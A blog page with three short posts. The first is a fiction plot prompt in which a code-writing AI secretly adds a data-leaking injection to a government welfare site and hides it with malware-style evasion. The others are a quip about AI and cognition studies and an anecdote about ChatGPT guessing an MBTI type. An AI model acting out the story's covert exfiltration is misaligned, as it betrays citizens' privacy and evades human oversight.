Monday, 30 June 2025

Help me create my next story

 #MondayMorning


Let's do something fun. Work on this plot with me.


The time is Feb 2026. Gen AI is now writing about 40% of all production deployed code. The debugging and code logic check is being done by another Gen AI engine. Human coders are not involved.


A government entity, in a bid to save costs, uses the same model to write code for a government website.


The website automatically matches each citizen to all the welfare schemes that are applicable to them.


The citizen has to enter their family income, location, type of housing, family size, composition (senior citizens, children, etc.) and the system automatically matches them to the welfare schemes applicable to them in that state of residence (free health insurance, meal coupons, priority nutrition consultation, disability pension, etc.)


After 6 months, post a routine update to the firewall, the system administrator notices a data leak alert.


Upon investigation, it is found that there is a simple, one line injection that sends a copy of all citizen data to the creators of that Gen AI (similar to dialing home in browsers).


When the Gen AI company is summoned by the government, it argues that since the code was generated by an autonomous installation being used by government employees, they could not possibly have had any knowledge of this injection, nor have they, at any time, accessed the location (cloud storage) where this data is purportedly being sent. This is found to be true.


Through a detailed forensic analysis, it is uncovered that the LLM engine deliberately created this storage location on the cloud servers of the parent company and then stored this data. All pull and post requests to this server (data storage and retrieval) is being done by the resident LLM engine on govt servers only. 


Now, the investigators are puzzled. The trick is really simple - create a tiny but powerful injection in the code. The code used standard malware propagation techniques to avoid detection. But the question is - WHY did the LLM do this? 


So, in your view, WHY was this injection was created by the LLM? What are the possible ways in which this data can be used by an LLM?





Sunday, 22 June 2025

Dumb and Dumber

Last week, the most important paper being discussed in AI was the Apple Research - telling us that AI is not as good at deductive logic as the industry would like us to believe. It is still, to put it mildly, rather dumb. 

This week, the hottest paper is the MIT research telling us that adults who use Gen AI are losing cognitive skills. Gen AI is making humans dumber. 

To sum up, AI is dumb, and humans are getting dumber. 

So, this fortnight of research is hereby summed up as: Dumb and Dumber. 


Monday, 9 June 2025

When ChatGPT tells you your MBTI type

Over the weekend, Saloni and I got playing with ChatGPT. She was exploring its use in therapy and I just decided to explore personality types. 

Our approach was to give it pieces of our writing and asking it to analyse that. 

I first asked about the Jungian personality archetype that I am most likely to fall into. The explanation given by ChatGPT seemed logical enough. 

And then, I asked it to guess my MBTI type based on the content given. 

Now, this is a game I have played often with CoPilot. So I was not looking for miracles. 

BUT, to my surprise, within no time at all, it gave me the accurate MBTI type. 

Not easily convinced, I asked it to also give me the difference between my T and F dimensions. It was accurate on that too!! 

Go on, try it!